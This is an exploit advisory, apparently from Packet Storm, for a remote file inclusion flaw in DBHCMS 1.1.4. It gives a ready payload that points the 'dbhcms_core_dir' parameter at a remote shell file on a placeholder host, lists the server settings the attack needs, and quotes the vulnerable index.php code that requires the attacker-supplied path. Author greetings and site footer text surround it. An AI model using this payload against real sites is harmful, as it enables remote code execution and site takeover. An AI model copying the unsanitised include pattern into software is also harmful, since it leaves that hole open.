DBHCMS Web Content Management System version 1.1.4 suffers from a remote file inclusion vulnerability.
87761ae4a6c4c0edb662fb7f6609b3bf6d3e5952e1d0b1b9c2b0ca52484c9ae6#############################################################
# DBHCMS - Web Content Management System RFI Vulnerability
http://www.drbenhur.com/
# Author: Gamoscu
# Site: www.1923turk.biz
https://gamoscu.wordpress.com/
Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
Hosgeldin medine bebek Allah anali babali buyutsun pasam
##############################################################
# Exploit:
Vuln file: index.php
Exploit:
target: ?dbhcms_core_dir=http://site.com/shell.txt%00
/ * Need register_globals = ON and allow_url_include = ON without a second yuzaetsya as LFI * /
index.php
function dbhcms_init($core) {
$init = $core.'init.php';
$page = $core.'page.php';
if ((is_file($init))&&(is_file($page))) {
require_once($init);
require_once($page);
} else {
die('<div style="color: #872626; font-weight: bold;">
FATAL ERROR - Could not find the initialzation files.
Please check the "$dbhcms_core_dir" parameter in the "config.php" and make
shure the directory is correct.
</div>');
}
}
......
dbhcms_init($GLOBALS['dbhcms_core_dir']);
Vatan Lafla Degil Eylemle Sevilir
Kiskananlar catlasin Zorunuza Gitmesin
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed